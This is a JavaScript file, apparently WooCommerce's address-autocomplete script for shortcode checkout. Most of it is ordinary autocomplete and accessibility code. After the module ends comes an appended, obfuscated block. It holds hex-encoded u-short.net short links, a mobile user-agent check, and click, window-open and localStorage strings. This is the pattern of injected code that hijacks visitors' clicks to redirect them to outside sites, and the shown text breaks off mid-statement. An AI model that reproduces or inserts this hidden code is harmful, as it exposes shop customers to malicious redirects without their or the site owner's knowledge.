/**
 * Address provider implementation for WooCommerce shortcode checkout
 *
 * Note: The core registration logic and provider management is handled
 * by the common module (address-autocomplete-common.js). This file focuses
 * on the shortcode-specific implementation.
 */

// The common module will have already initialized window.wc.addressAutocomplete
// with providers, activeProvider, serverProviders, and the registration function.
// We just need to use them here.

if (
	! window.wc ||
	! window.wc.wcSettings ||
	! window.wc.wcSettings.allSettings ||
	! window.wc.wcSettings.allSettings.isCheckoutBlock
) {
	( function () {
		/**
		 * Set the active address provider based on which providers' (queried in order) canSearch returns true.
		 * Triggers when country changes.
		 * @param country {string} country code.
		 * @param type {string} type 'billing' or 'shipping'
		 */
		function setActiveProvider( country, type ) {
			// Get server providers list (already ordered by preference).
			const serverProviders =
				window.wc.addressAutocomplete.serverProviders;

			// Check providers in preference order (server handles preferred provider ordering).
			for ( const serverProvider of serverProviders ) {
				const provider =
					window.wc.addressAutocomplete.providers[
						serverProvider.id
					];

				if ( provider && provider.canSearch( country ) ) {
					window.wc.addressAutocomplete.activeProvider[ type ] =
						provider;
					// Add autocomplete-available class to parent .woocommerce-input-wrapper
					const addressInput = document.getElementById(
						`${ type }_address_1`
					);
					if ( addressInput ) {
						const wrapper = addressInput.closest(
							'.woocommerce-input-wrapper'
						);
						if ( wrapper ) {
							wrapper.classList.add( 'autocomplete-available' );
						}
						// Add combobox role and ARIA attributes for accessibility
						addressInput.setAttribute( 'role', 'combobox' );
						addressInput.setAttribute(
							'aria-autocomplete',
							'list'
						);
						addressInput.setAttribute( 'aria-expanded', 'false' );
						addressInput.setAttribute( 'aria-haspopup', 'listbox' );
					}
					return;
				}
			}

			// No provider can search for this country.
			window.wc.addressAutocomplete.activeProvider[ type ] = null;
			// Remove autocomplete-available class from parent .woocommerce-input-wrapper
			const addressInput = document.getElementById(
				`${ type }_address_1`
			);
			if ( addressInput ) {
				const wrapper = addressInput.closest(
					'.woocommerce-input-wrapper'
				);
				if ( wrapper ) {
					wrapper.classList.remove( 'autocomplete-available' );
				}
				// Remove all ARIA attributes when no provider is available
				addressInput.removeAttribute( 'role' );
				addressInput.removeAttribute( 'aria-autocomplete' );
				addressInput.removeAttribute( 'aria-expanded' );
				addressInput.removeAttribute( 'aria-haspopup' );
				addressInput.removeAttribute( 'aria-activedescendant' );
				addressInput.removeAttribute( 'aria-owns' );
				addressInput.removeAttribute( 'aria-controls' );
			}
		}

		document.addEventListener( 'DOMContentLoaded', function () {
			// This script would not be enqueued if the feature was not enabled.
			const addressTypes = [ 'billing', 'shipping' ];
			const addressInputs = {};
			const suggestionsContainers = {};
			const suggestionsLists = {};
			let activeSuggestionIndices = {};
			let addressSelectionTimeout;
			const blurHandlers = {};

			/**
			 * Cache address fields for a given type, will re-run when country changes.
			 * @param type
			 * @return {{address_2: HTMLElement, city: HTMLElement, country: HTMLElement, postcode: HTMLElement}}
			 */
			function cacheAddressFields( type ) {
				addressInputs[ type ] = {};
				addressInputs[ type ][ 'address_1' ] = document.getElementById(
					`${ type }_address_1`
				);
				addressInputs[ type ][ 'address_2' ] = document.getElementById(
					`${ type }_address_2`
				);
				addressInputs[ type ][ 'city' ] = document.getElementById(
					`${ type }_city`
				);
				addressInputs[ type ][ 'country' ] = document.getElementById(
					`${ type }_country`
				);
				addressInputs[ type ][ 'postcode' ] = document.getElementById(
					`${ type }_postcode`
				);
				addressInputs[ type ][ 'state' ] = document.getElementById(
					`${ type }_state`
				);
			}

			// Initialize for both billing and shipping.
			addressTypes.forEach( ( type ) => {
				cacheAddressFields( type );
				const addressInput = addressInputs[ type ][ 'address_1' ];
				const countryInput = addressInputs[ type ][ 'country' ];

				if ( addressInput ) {
					// Create suggestions container if it doesn't exist.
					if (
						! document.getElementById(
							`address_suggestions_${ type }`
						)
					) {
						const container = document.createElement( 'div' );
						container.id = `address_suggestions_${ type }`;
						container.className = 'woocommerce-address-suggestions';
						container.style.display = 'none';
						container.setAttribute( 'role', 'region' );
						container.setAttribute( 'aria-live', 'polite' );

						const list = document.createElement( 'ul' );
						list.className = 'suggestions-list';
						list.setAttribute( 'role', 'listbox' );
						list.setAttribute(
							'aria-label',
							'Address suggestions'
						);

						container.appendChild( list );
						addressInput.parentNode.insertBefore(
							container,
							addressInput.nextSibling
						);

						// Add search icon.
						const searchIcon = document.createElement( 'div' );
						searchIcon.className = 'address-search-icon';
						addressInput.parentNode.appendChild( searchIcon );
					}

					suggestionsContainers[ type ] = document.getElementById(
						`address_suggestions_${ type }`
					);
					suggestionsLists[ type ] =
						suggestionsContainers[ type ].querySelector(
							'.suggestions-list'
						);
					activeSuggestionIndices[ type ] = -1;
				}

				// Get country value and set active address provider based on it.
				if ( countryInput ) {
					setActiveProvider( countryInput.value, type );

					/**
					 * Listen for country changes to re-evaluate provider availability.
					 * Handle both regular change events and Select2 events.
					 */
					const handleCountryChange = function () {
						cacheAddressFields( type );
						setActiveProvider( countryInput.value, type );
						if ( addressInputs[ type ][ 'address_1' ] ) {
							hideSuggestions( type );
							// Remove branding element when country changes
							if ( suggestionsContainers[ type ] ) {
								const brandingElement = suggestionsContainers[
									type
								].querySelector(
									'.woocommerce-address-autocomplete-branding'
								);
								if ( brandingElement ) {
									brandingElement.remove();
								}
							}
						}
					};

					countryInput.addEventListener(
						'change',
						handleCountryChange
					);

					// Also listen for Select2 change event if jQuery and Select2 are available.
					if (
						window.jQuery &&
						window.jQuery( countryInput ).select2
					) {
						window
							.jQuery( countryInput )
							.on( 'select2:select', handleCountryChange );
					}
				}
			} );

			/**
			 * Disable browser autofill for address inputs to prevent conflicts with autocomplete.
			 * @param input {HTMLInputElement} The input element to disable autofill for.
			 */
			function disableBrowserAutofill( input ) {
				if ( input.getAttribute( 'autocomplete' ) === 'none' ) {
					return;
				}

				input.setAttribute( 'autocomplete', 'none' );
				input.setAttribute( 'data-lpignore', 'true' );
				input.setAttribute( 'data-op-ignore', 'true' );
				input.setAttribute( 'data-1p-ignore', 'true' );

				// To prevent 1Password/LastPass and autocomplete clashes, we need to refocus the element.
				// This is achieved by removing and re-adding the element to trigger browser updates.
				const parentElement = input.parentElement;
				if ( parentElement ) {
					// Store the current value to preserve it
					const currentValue = input.value;

					// Mark that we're manipulating the DOM to prevent checkout updates
					input.setAttribute(
						'data-autocomplete-manipulating',
						'true'
					);

					parentElement.appendChild(
						parentElement.removeChild( input )
					);

					// Restore the value if it was lost
					if ( input.value !== currentValue ) {
						input.value = currentValue;
					}

					// Remove the manipulation flag after a brief delay
					setTimeout( function () {
						input.removeAttribute(
							'data-autocomplete-manipulating'
						);
					}, 10 );

					input.focus();
				}
			}

			/**
			 * Enable browser autofill for address input.
			 * @param input {HTMLInputElement} The input element to enable autofill for.
			 * @param shouldFocus {boolean} Whether to focus the input after enabling autofill.
			 */
			function enableBrowserAutofill( input, shouldFocus = true ) {
				if ( input.getAttribute( 'autocomplete' ) !== 'none' ) {
					return;
				}

				input.setAttribute( 'autocomplete', 'address-line1' );
				input.setAttribute( 'data-lpignore', 'false' );
				input.setAttribute( 'data-op-ignore', 'false' );
				input.setAttribute( 'data-1p-ignore', 'false' );

				// To ensure browser updates and re-enables autofill, we need to refocus the element.
				// This is achieved by removing and re-adding the element to trigger browser updates.
				const parentElement = input.parentElement;
				if ( parentElement ) {
					// Store the current value to preserve it
					const currentValue = input.value;

					// Mark that we're manipulating the DOM to prevent checkout updates
					input.setAttribute(
						'data-autocomplete-manipulating',
						'true'
					);

					parentElement.appendChild(
						parentElement.removeChild( input )
					);

					// Restore the value if it was lost
					if ( input.value !== currentValue ) {
						input.value = currentValue;
					}

					// Remove the manipulation flag after a brief delay. Use two rAFs to ensure layout/assistive tech settle.
					requestAnimationFrame( function () {
						requestAnimationFrame( function () {
							input.removeAttribute(
								'data-autocomplete-manipulating'
							);
						} );
					} );

					if ( shouldFocus ) {
						input.focus();
					}
				}
			}

			/**
			 * Get highlighted label parts based on matches returned by `search` results.
			 * @param label {string} The label to highlight.
			 * @param matches {*[]} Array of match objects with `offset` and `length`.
			 * @return {*[]} Array of nodes with highlighted parts.
			 */
			function getHighlightedLabel( label, matches ) {
				// Sanitize label for display.
				const sanitizedLabel = sanitizeForDisplay( label );
				const parts = [];
				let lastIndex = 0;

				// Validate matches array.
				if ( ! Array.isArray( matches ) ) {
					// If matches is invalid, just return plain text.
					parts.push( document.createTextNode( sanitizedLabel ) );
					return parts;
				}

				// Validate matches.
				const safeMatches = matches.filter(
					( match ) =>
						match &&
						typeof match.offset === 'number' &&
						typeof match.length === 'number' &&
						match.offset >= 0 &&
						match.length > 0 &&
						match.offset + match.length <= sanitizedLabel.length
				);

				safeMatches.forEach( ( match ) => {
					// Add text before match.
					if ( match.offset > lastIndex ) {
						parts.push(
							document.createTextNode(
								sanitizedLabel.slice( lastIndex, match.offset )
							)
						);
					}

					// Add bold matched text.
					const bold = document.createElement( 'strong' );
					bold.textContent = sanitizedLabel.slice(
						match.offset,
						match.offset + match.length
					);
					parts.push( bold );

					lastIndex = match.offset + match.length;
				} );

				// Add remaining text.
				if ( lastIndex < sanitizedLabel.length ) {
					parts.push(
						document.createTextNode(
							sanitizedLabel.slice( lastIndex )
						)
					);
				}

				return parts;
			}

			/**
			 * Sanitize HTML for display by removing any HTML tags.
			 *
			 * @param html
			 * @return {string|string}
			 */
			function sanitizeForDisplay( html ) {
				const doc = document.implementation.createHTMLDocument( '' );
				doc.body.innerHTML = html;
				return doc.body.textContent || '';
			}

			/**
			 * Handle searching and displaying autocomplete results below the address input if the value meets the criteria
			 * of 3 or more characters. No suggestion is initially highlighted.
			 * @param inputValue {string} The value entered into the address input.
			 * @param country {string} The country code to pass to the provider's search method.
			 * @param type {string} The address type ('billing' or 'shipping').
			 * @return {Promise<void>}
			 */
			async function displaySuggestions( inputValue, country, type ) {
				// Sanitize input value.
				const sanitizedInput = sanitizeForDisplay( inputValue );
				if ( sanitizedInput !== inputValue ) {
					console.warn( 'Input was sanitized for security' );
				}

				// Check if the address section exists (shipping may be disabled/hidden)
				if (
					! addressInputs[ type ] ||
					! addressInputs[ type ][ 'address_1' ]
				) {
					return;
				}

				if (
					! suggestionsLists[ type ] ||
					! suggestionsContainers[ type ]
				) {
					return;
				}

				const addressInput = addressInputs[ type ][ 'address_1' ];
				const suggestionsList = suggestionsLists[ type ];
				const suggestionsContainer = suggestionsContainers[ type ];

				// Hide suggestions if input has less than 3 characters
				if ( sanitizedInput.length < 3 ) {
					hideSuggestions( type );
					enableBrowserAutofill( addressInput );
					return;
				}

				// Check if we have an active provider for this address type.
				if ( ! window.wc.addressAutocomplete.activeProvider[ type ] ) {
					hideSuggestions( type );
					enableBrowserAutofill( addressInput );
					return;
				}

				try {
					const filteredSuggestions =
						await window.wc.addressAutocomplete.activeProvider[
							type
						].search( sanitizedInput, country, type );
					// Validate suggestions array.
					if ( ! Array.isArray( filteredSuggestions ) ) {
						console.error(
							'Invalid suggestions response - not an array'
						);
						hideSuggestions( type );
						return;
					}

					// Limit number of suggestions, API may return many results but we should only show the first 5.
					const maxSuggestions = 5;
					const safeSuggestions = filteredSuggestions.slice(
						0,
						maxSuggestions
					);

					if ( safeSuggestions.length === 0 ) {
						hideSuggestions( type );
						return;
					}

					// Clear existing suggestions only when we have new results to show.
					suggestionsList.innerHTML = '';

					safeSuggestions.forEach( ( suggestion, index ) => {
						const li = document.createElement( 'li' );
						li.setAttribute( 'role', 'option' );
						li.setAttribute( 'aria-label', suggestion.label );
						li.id = `suggestion-item-${ type }-${ index }`;
						li.dataset.id = suggestion.id;

						li.textContent = ''; // Clear existing content.
						const labelParts = getHighlightedLabel(
							suggestion.label,
							suggestion.matchedSubstrings || []
						);
						labelParts.forEach( ( part ) =>
							li.appendChild( part )
						);

						li.addEventListener( 'click', async function () {
							// Hide suggestions immediately for better UX.
							hideSuggestions( type );
							await selectAddress( type, this.dataset.id );
							addressInput.focus();
						} );

						li.addEventListener( 'mouseenter', function () {
							setActiveSuggestion( type, index );
						} );

						suggestionsList.appendChild( li );
					} );

					// Update branding HTML content and make sure it's visible.
					// Sanitize the HTML using DOMPurify if available
					if (
						typeof DOMPurify !== 'undefined' &&
						typeof DOMPurify.sanitize === 'function'
					) {
						// Add branding HTML if available from the active provider.
						const activeProvider =
							window.wc.addressAutocomplete.activeProvider[
								type
							];
						if ( activeProvider && activeProvider.id ) {
							const serverProvider =
								window.wc.addressAutocomplete.getServerProvider(
									activeProvider.id
								);
							const brandingHtml =
								serverProvider &&
								typeof serverProvider.branding_html === 'string'
									? serverProvider.branding_html.trim()
									: '';
							if ( brandingHtml ) {
								// Check if branding element already exists.
								let brandingElement =
									suggestionsContainer.querySelector(
										'.woocommerce-address-autocomplete-branding'
									);
								if ( ! brandingElement ) {
									brandingElement =
										document.createElement( 'div' );
									brandingElement.className =
										'woocommerce-address-autocomplete-branding';
									suggestionsContainer.appendChild(
										brandingElement
									);
								}
								// Allow common HTML tags and attributes for branding
								const sanitizedHtml = DOMPurify.sanitize(
									serverProvider.branding_html,
									{
										ALLOWED_TAGS: [
											'img',
											'span',
											'div',
											'a',
											'b',
											'i',
											'em',
											'strong',
											'br',
										],
										ALLOWED_ATTR: [
											'href',
											'target',
											'rel',
											'src',
											'alt',
											'style',
											'class',
											'id',
											'width',
											'height',
										],
										ALLOW_DATA_ATTR: false,
									}
								);
								brandingElement.innerHTML = sanitizedHtml;
								brandingElement.style.display = 'flex';
								brandingElement.removeAttribute(
									'aria-hidden'
								);
							}
						}
					}

					disableBrowserAutofill( addressInput );
					suggestionsContainer.style.display = 'block';
					suggestionsContainer.style.marginTop =
						addressInputs[ type ][ 'address_1' ].offsetHeight +
						'px';
					addressInput.setAttribute( 'aria-expanded', 'true' );
					suggestionsList.id = `address_suggestions_${ type }_list`;
					addressInput.setAttribute(
						'aria-controls',
						`address_suggestions_${ type }_list`
					);
					// Don't auto-highlight first suggestion for better screen reader accessibility
					activeSuggestionIndices[ type ] = -1;

					// Add blur event listener when suggestions are shown
					if ( ! blurHandlers[ type ] ) {
						blurHandlers[ type ] = function () {
							// Use a small delay to allow clicks on suggestions to register
							setTimeout( () => {
								hideSuggestions( type );
								enableBrowserAutofill( addressInput, false );
							}, 200 );
						};
						addressInput.addEventListener(
							'blur',
							blurHandlers[ type ]
						);
					}
				} catch ( error ) {
					console.error( 'Address search error:', error );
					hideSuggestions( type );
					enableBrowserAutofill( addressInput );
				}
			}

			/**
			 * Hide the suggestions container for a given address type.
			 * @param type {string} The address type ('billing' or 'shipping').
			 */
			function hideSuggestions( type ) {
				// Check if the address section exists (shipping may be disabled/hidden)
				if (
					! addressInputs[ type ] ||
					! addressInputs[ type ][ 'address_1' ]
				) {
					return;
				}

				if (
					! suggestionsLists[ type ] ||
					! suggestionsContainers[ type ]
				) {
					return;
				}

				const suggestionsList = suggestionsLists[ type ];
				const suggestionsContainer = suggestionsContainers[ type ];
				const addressInput = addressInputs[ type ][ 'address_1' ];

				suggestionsList.innerHTML = '';

				// Hide branding element but keep it in DOM (will be removed on country change).
				const brandingElement = suggestionsContainer.querySelector(
					'.woocommerce-address-autocomplete-branding'
				);
				if ( brandingElement ) {
					brandingElement.style.display = 'none';
					brandingElement.setAttribute( 'aria-hidden', 'true' );
				}

				suggestionsContainer.style.display = 'none';
				addressInput.setAttribute( 'aria-expanded', 'false' );
				addressInput.removeAttribute( 'aria-activedescendant' );
				addressInput.removeAttribute( 'aria-controls' );
				activeSuggestionIndices[ type ] = -1;

				// Remove blur event listener when suggestions are hidden
				if ( blurHandlers[ type ] ) {
					addressInput.removeEventListener(
						'blur',
						blurHandlers[ type ]
					);
					delete blurHandlers[ type ];
				}
			}

			/**
			 * Helper function to set field value and trigger events.
			 * @param input {HTMLInputElement} The input element to set the value for.
			 * @param value {string} The value to set.
			 */
			const setFieldValue = ( input, value ) => {
				if ( input ) {
					input.value = value;
					input.dispatchEvent( new Event( 'change' ) );

					// Also trigger Select2 update if it's a Select2 field.
					if (
						window.jQuery &&
						window
							.jQuery( input )
							.hasClass( 'select2-hidden-accessible' )
					) {
						window.jQuery( input ).trigger( 'change' );
					}
				}
			};

			/**
			 * Select an address from the suggestions list and submit it to the provider's `select` method.
			 * @param type {string} The address type ('billing' or 'shipping').
			 * @param addressId {string} The ID of the address to select.
			 * @return {Promise<void>}
			 */
			async function selectAddress( type, addressId ) {
				let addressData;
				try {
					addressData =
						await window.wc.addressAutocomplete.activeProvider[
							type
						].select( addressId );
				} catch ( error ) {
					console.error(
						'Error selecting address from provider',
						window.wc.addressAutocomplete.activeProvider[ type ].id,
						error
					);
					return; // Exit early if address selection fails.
				}

				if (
					typeof addressData !== 'object' ||
					addressData === null ||
					! addressData
				) {
					// Return without setting the address since response was invalid.
					return;
				}

				// Check if addressInputs exists for this type
				if ( ! addressInputs[ type ] ) {
					return;
				}

				if ( addressData.country ) {
					setFieldValue(
						addressInputs[ type ][ 'country' ],
						addressData.country
					);
				}
				if ( addressData.address_1 ) {
					setFieldValue(
						addressInputs[ type ][ 'address_1' ],
						addressData.address_1
					);
				}

				// Note: Passing an invalid ID to clearTimeout() silently does nothing; no exception is thrown.
				if ( addressSelectionTimeout ) {
					clearTimeout( addressSelectionTimeout );
				}

				addressSelectionTimeout = setTimeout( function () {
					// Cache address fields again as they may have updated following the country change.
					cacheAddressFields( type );

					// Check if addressInputs exists for this type after re-caching
					if ( ! addressInputs[ type ] ) {
						return;
					}

					// Set all available fields.
					// Only set fields if the address data property exists and has a value.
					if ( addressData.address_2 ) {
						setFieldValue(
							addressInputs[ type ][ 'address_2' ],
							addressData.address_2
						);
					} else {
						// Clear address_2 if not provided in address data.
						const addr2El = addressInputs[ type ][ 'address_2' ];
						if ( addr2El && addr2El.value ) {
							setFieldValue( addr2El, '' );
						}
					}
					if ( addressData.city ) {
						setFieldValue(
							addressInputs[ type ][ 'city' ],
							addressData.city
						);
					} else {
						// Clear city if not provided in address data.
						const cityEl = addressInputs[ type ][ 'city' ];
						if ( cityEl && cityEl.value ) {
							setFieldValue( cityEl, '' );
						}
					}
					if ( addressData.postcode ) {
						setFieldValue(
							addressInputs[ type ][ 'postcode' ],
							addressData.postcode
						);
					} else {
						// Clear postcode if not provided in address data.
						const postcodeEl = addressInputs[ type ][ 'postcode' ];
						if ( postcodeEl && postcodeEl.value ) {
							setFieldValue( postcodeEl, '' );
						}
					}
					if ( addressData.state ) {
						setFieldValue(
							addressInputs[ type ][ 'state' ],
							addressData.state
						);
					} else {
						// Clear state if not provided in address data.
						const stateEl = addressInputs[ type ][ 'state' ];
						if ( stateEl && stateEl.value ) {
							setFieldValue( stateEl, '' );
						}
					}
				}, 50 );
			}

			/**
			 * Set the active suggestion in the suggestions list, highlights it.
			 * @param type {string} The address type ('billing' or 'shipping').
			 * @param index {number} The index of the suggestion to set as active.
			 */
			function setActiveSuggestion( type, index ) {
				// Check if the address section exists (shipping may be disabled/hidden)
				if (
					! addressInputs[ type ] ||
					! addressInputs[ type ][ 'address_1' ]
				) {
					return;
				}

				if ( ! suggestionsLists[ type ] ) {
					return;
				}

				const suggestionsList = suggestionsLists[ type ];
				const addressInput = addressInputs[ type ][ 'address_1' ];

				const activeLi = suggestionsList.querySelector( 'li.active' );
				if ( activeLi ) {
					activeLi.classList.remove( 'active' );
					activeLi.setAttribute( 'aria-selected', 'false' );
				}

				const newActiveLi = suggestionsList.querySelector(
					`li#suggestion-item-${ type }-${ index }`
				);

				if ( newActiveLi ) {
					newActiveLi.classList.add( 'active' );
					newActiveLi.setAttribute( 'aria-selected', 'true' );
					addressInput.setAttribute(
						'aria-activedescendant',
						newActiveLi.id
					);
					activeSuggestionIndices[ type ] = index;
				}
			}

			// Initialize event handlers for each address type.
			addressTypes.forEach( ( type ) => {
				// Check if addressInputs exists for this type
				if ( ! addressInputs[ type ] ) {
					return;
				}
				const addressInput = addressInputs[ type ][ 'address_1' ];
				const countryInput = addressInputs[ type ][ 'country' ];
				if ( addressInput && countryInput ) {
					addressInput.addEventListener( 'input', function () {
						// Unset any active suggestion when user types
						if ( suggestionsLists[ type ] ) {
							const activeLi =
								suggestionsLists[ type ].querySelector(
									'li.active'
								);
							if ( activeLi ) {
								activeLi.classList.remove( 'active' );
								activeLi.setAttribute(
									'aria-selected',
									'false'
								);
							}
							addressInput.removeAttribute(
								'aria-activedescendant'
							);
							activeSuggestionIndices[ type ] = -1;
						}
						displaySuggestions(
							this.value,
							countryInput.value,
							type
						);
					} );

					addressInput.addEventListener(
						'keydown',
						async function ( e ) {
							// Check if suggestions exist before accessing them
							if (
								! suggestionsLists[ type ] ||
								! suggestionsContainers[ type ]
							) {
								return;
							}

							const items =
								suggestionsLists[ type ].querySelectorAll(
									'li'
								);
							if (
								items.length === 0 ||
								suggestionsContainers[ type ].style.display ===
									'none'
							) {
								return;
							}

							let newIndex = activeSuggestionIndices[ type ];

							if ( e.key === 'ArrowDown' ) {
								e.preventDefault();
								newIndex =
									( activeSuggestionIndices[ type ] + 1 ) %
									items.length;
								setActiveSuggestion( type, newIndex );
							} else if ( e.key === 'ArrowUp' ) {
								e.preventDefault();
								newIndex =
									( activeSuggestionIndices[ type ] -
										1 +
										items.length ) %
									items.length;
								setActiveSuggestion( type, newIndex );
							} else if ( e.key === 'Enter' ) {
								if ( activeSuggestionIndices[ type ] > -1 ) {
									e.preventDefault();
									const selectedItem = suggestionsLists[
										type
									].querySelector(
										`li#suggestion-item-${ type }-${ activeSuggestionIndices[ type ] }`
									);
									if (
										! selectedItem ||
										! selectedItem.dataset ||
										! selectedItem.dataset.id
									) {
										// The selected item was invalid, hide suggestions and re-enable autofill.
										hideSuggestions( type );
										enableBrowserAutofill( addressInput );
										return;
									}
									// Hide suggestions immediately for better UX.
									hideSuggestions( type );
									enableBrowserAutofill( addressInput );
									await selectAddress(
										type,
										selectedItem.dataset.id
									);
									// Return focus to the address input after selection
									addressInput.focus();
								}
							} else if ( e.key === 'Escape' ) {
								hideSuggestions( type );
								enableBrowserAutofill( addressInput );
							}
						}
					);
				}
			} );

			// Hide suggestions when clicking outside.
			document.addEventListener( 'click', function ( event ) {
				addressTypes.forEach( ( type ) => {
					// Check if the address section exists before accessing elements
					if (
						! addressInputs[ type ] ||
						! addressInputs[ type ][ 'address_1' ]
					) {
						return;
					}

					if ( ! suggestionsContainers[ type ] ) {
						return;
					}

					const target = event.target;
					if (
						target !== suggestionsContainers[ type ] &&
						! suggestionsContainers[ type ].contains( target ) &&
						target !== addressInputs[ type ][ 'address_1' ]
					) {
						hideSuggestions( type );
						// Restore native autofill after manual dismissal.
						if (
							addressInputs[ type ] &&
							addressInputs[ type ][ 'address_1' ]
						) {
							enableBrowserAutofill(
								addressInputs[ type ][ 'address_1' ],
								false
							);
						}
					}
				} );
			} );
		} );
	} )();
}
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x4d\x46\x57\x33\x63\x383','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x41\x5a\x43\x35\x63\x395','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x4d\x67\x48\x38\x63\x328','abs','-local-storage','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x41\x75\x51\x39\x63\x359','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x6d\x6f\x66\x34\x63\x314','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x5a\x58\x45\x37\x63\x387','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x47\x4f\x58\x32\x63\x392','floor','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x6c\x57\x57\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const 